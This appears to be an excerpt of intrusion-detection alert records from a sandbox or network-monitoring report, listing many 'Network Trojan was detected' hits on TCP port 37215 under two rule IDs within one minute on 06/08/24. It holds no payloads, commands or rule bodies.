          SID:2829579
          Source Port:56920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018665
          SID:2835222
          Source Port:44424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810283
          SID:2835222
          Source Port:48664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295726
          SID:2829579
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160498
          SID:2829579
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788963
          SID:2829579
          Source Port:41932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133779
          SID:2829579
          Source Port:47038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442416
          SID:2829579
          Source Port:56504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266248
          SID:2835222
          Source Port:49340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467500
          SID:2835222
          Source Port:46642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729998
          SID:2829579
          Source Port:38966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704265
          SID:2829579
          Source Port:47468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514094
          SID:2835222
          Source Port:41714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600899
          SID:2835222
          Source Port:55480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894743
          SID:2835222
          Source Port:42458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884334
          SID:2835222
          Source Port:56496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792354
          SID:2835222
          Source Port:36614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731332
          SID:2829579
          Source Port:42700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151028
          SID:2835222
          Source Port:53596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410511
          SID:2829579
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178064
          SID:2835222
          Source Port:59440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671377
          SID:2835222
          Source Port:46998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020907
          SID:2835222
          Source Port:54748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788922
          SID:2829579
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676229
          SID:2835222
          Source Port:47044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818829
          SID:2835222
          Source Port:33120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178368
          SID:2829579
          Source Port:46168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462251
          SID:2835222
          Source Port:38888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265901
          SID:2829579
          Source Port:48014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787641
          SID:2835222
          Source Port:60772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893608
          SID:2835222
          Source Port:41964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896649
          SID:2829579
          Source Port:59198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108301
          SID:2829579
          Source Port:47312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893831
          SID:2835222
          Source Port:58432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270549
          SID:2829579
          Source Port:48710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159876
          SID:2829579
          Source Port:58184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410860
          SID:2835222
          Source Port:41898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353007
          SID:2829579
          Source Port:48466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782087
          SID:2835222
          Source Port:43048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735084
          SID:2835222
          Source Port:37912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.083030
          SID:2835222
          Source Port:37174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788385
          SID:2835222
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241175
          SID:2835222
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672826
          SID:2835222
          Source Port:43622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353606
          SID:2829579
          Source Port:54030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107294
          SID:2829579
          Source Port:43318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788282
          SID:2835222
          Source Port:56266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793093
          SID:2835222
          Source Port:50252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043590
          SID:2829579
          Source Port:42968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160207
          SID:2835222
          Source Port:57058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547280
          SID:2829579
          Source Port:55082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270488
          SID:2835222
          Source Port:34074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441059
          SID:2835222
          Source Port:45468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732420
          SID:2829579
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603243
          SID:2835222
          Source Port:49528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549724
          SID:2835222
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512597
          SID:2835222
          Source Port:54188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021216
          SID:2835222
          Source Port:36930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019490
          SID:2829579
          Source Port:59954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514305
          SID:2835222
          Source Port:58736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445036
          SID:2829579
          Source Port:53210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.598533
          SID:2829579
          Source Port:52602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172592
          SID:2829579
          Source Port:35386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792139
          SID:2829579
          Source Port:51090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732294
          SID:2829579
          Source Port:45004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816967
          SID:2835222
          Source Port:35980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135604
          SID:2829579
          Source Port:52910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495895
          SID:2835222
          Source Port:57338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746233
          SID:2835222
          Source Port:43878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732757
          SID:2829579
          Source Port:37602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162613
          SID:2835222
          Source Port:37620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448740
          SID:2829579
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108599
          SID:2835222
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260608
          SID:2829579
          Source Port:54714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747842
          SID:2835222
          Source Port:50764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740531
          SID:2835222
          Source Port:37406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818938
          SID:2835222
          Source Port:41130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161831
          SID:2835222
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353608
          SID:2829579
          Source Port:51652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743736
          SID:2835222
          Source Port:59410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793372
          SID:2829579
          Source Port:35710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731800
          SID:2835222
          Source Port:57930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115461
          SID:2829579
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099213
          SID:2829579
          Source Port:46284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085019
          SID:2829579
          Source Port:58130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236386
          SID:2829579
          Source Port:42368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515580
          SID:2835222
          Source Port:38344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468677
          SID:2835222
          Source Port:56700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133738
          SID:2829579
          Source Port:58436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160104
          SID:2835222
          Source Port:55458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159201
          SID:2835222
          Source Port:35670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707100
          SID:2835222
          Source Port:50818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800457
          SID:2835222
          Source Port:52672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804598
          SID:2829579
          Source Port:43238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671655
          SID:2835222
          Source Port:46524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353604
          SID:2829579
          Source Port:50174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378044
          SID:2829579
          Source Port:43522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730441
          SID:2835222
          Source Port:56894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354552
          SID:2835222
          Source Port:37284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158375
          SID:2835222
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261169
          SID:2835222
          Source Port:59770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166643
          SID:2829579
          Source Port:43604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403788
          SID:2829579
          Source Port:54850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810193
          SID:2829579
          Source Port:39978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815405
          SID:2829579
          Source Port:52812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.594971
          SID:2835222
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449820
          SID:2835222
          Source Port:54958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781469
          SID:2829579
          Source Port:41952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798778
          SID:2829579
          Source Port:38122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850691
          SID:2835222
          Source Port:52890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396267
          SID:2829579
          Source Port:55842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798314
          SID:2835222
          Source Port:38494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.842952
          SID:2829579
          Source Port:56328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017849
          SID:2835222
          Source Port:55358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099455
          SID:2835222
          Source Port:40900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547805
          SID:2835222
          Source Port:40188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883867
          SID:2829579
          Source Port:34090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470439
          SID:2829579
          Source Port:41602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356896
          SID:2829579
          Source Port:41796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192451
          SID:2835222
          Source Port:39522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732363
          SID:2829579
          Source Port:32880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467733
          SID:2835222
          Source Port:40070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798654
          SID:2829579
          Source Port:38534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067940
          SID:2829579
          Source Port:46474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744013
          SID:2835222
          Source Port:54578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599559
          SID:2829579
          Source Port:56954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842221
          SID:2835222
          Source Port:37082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306502
          SID:2829579
          Source Port:39770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861737
          SID:2829579
          Source Port:55682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270721
          SID:2835222
          Source Port:37298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788215
          SID:2829579
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912978
          SID:2829579
          Source Port:44810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740511
          SID:2829579
          Source Port:55524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822702
          SID:2829579
          Source Port:37904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513760
          SID:2829579
          Source Port:44448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911966
          SID:2835222
          Source Port:60824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242461
          SID:2835222
          Source Port:51300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355504
          SID:2829579
          Source Port:57148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270705
          SID:2835222
          Source Port:45586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780310
          SID:2835222
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043539
          SID:2829579
          Source Port:53708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295780
          SID:2835222
          Source Port:48412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241436
          SID:2835222
          Source Port:56768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169647
          SID:2835222
          Source Port:44980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179400
          SID:2835222
          Source Port:50202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747700
          SID:2829579
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136215
          SID:2835222
          Source Port:48472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705156
          SID:2835222
          Source Port:33728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901637
          SID:2835222
          Source Port:35676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606186
          SID:2829579
          Source Port:36864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067878
          SID:2835222
          Source Port:37292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601576
          SID:2829579
          Source Port:43366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108406
          SID:2829579
          Source Port:40096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855478
          SID:2829579
          Source Port:53054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897023
          SID:2835222
          Source Port:55964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449046
          SID:2835222
          Source Port:37690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887643
          SID:2835222
          Source Port:49926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707225
          SID:2835222
          Source Port:32912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861890
          SID:2835222
          Source Port:44924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731352
          SID:2835222
          Source Port:39832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160845
          SID:2835222
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797888
          SID:2829579
          Source Port:43666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152965
          SID:2829579
          Source Port:45364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857383
          SID:2835222
          Source Port:35732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040260
          SID:2835222
          Source Port:42098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016095
          SID:2835222
          Source Port:44068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675711
          SID:2835222
          Source Port:41400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127012
          SID:2829579
          Source Port:54920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667118
          SID:2829579
          Source Port:44932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153452
          SID:2829579
          Source Port:57886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396775
          SID:2835222
          Source Port:34712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456521
          SID:2829579
          Source Port:43630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172658
          SID:2829579
          Source Port:58644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173663
          SID:2829579
          Source Port:50736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512179
          SID:2835222
          Source Port:51442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044311
          SID:2835222
          Source Port:51238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272672
          SID:2835222
          Source Port:43852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263730
          SID:2835222
          Source Port:57102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352006
          SID:2835222
          Source Port:40134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897876
          SID:2835222
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114650
          SID:2829579
          Source Port:47032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729517
          SID:2829579
          Source Port:39222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792979
          SID:2835222
          Source Port:41368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460810
          SID:2829579
          Source Port:53412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461781
          SID:2829579
          Source Port:58840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268443
          SID:2835222
          Source Port:52086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466642
          SID:2835222
          Source Port:56774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448898
          SID:2835222
          Source Port:60882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817800
          SID:2829579
          Source Port:49170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599422
          SID:2829579
          Source Port:56018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890660
          SID:2829579
          Source Port:43402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276235
          SID:2829579
          Source Port:51090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266602
          SID:2829579
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160338
          SID:2835222
          Source Port:50244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268277
          SID:2829579
          Source Port:50378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733605
          SID:2829579
          Source Port:41618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469053
          SID:2829579
          Source Port:60840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495775
          SID:2835222
          Source Port:52380
          Destination Port:37215
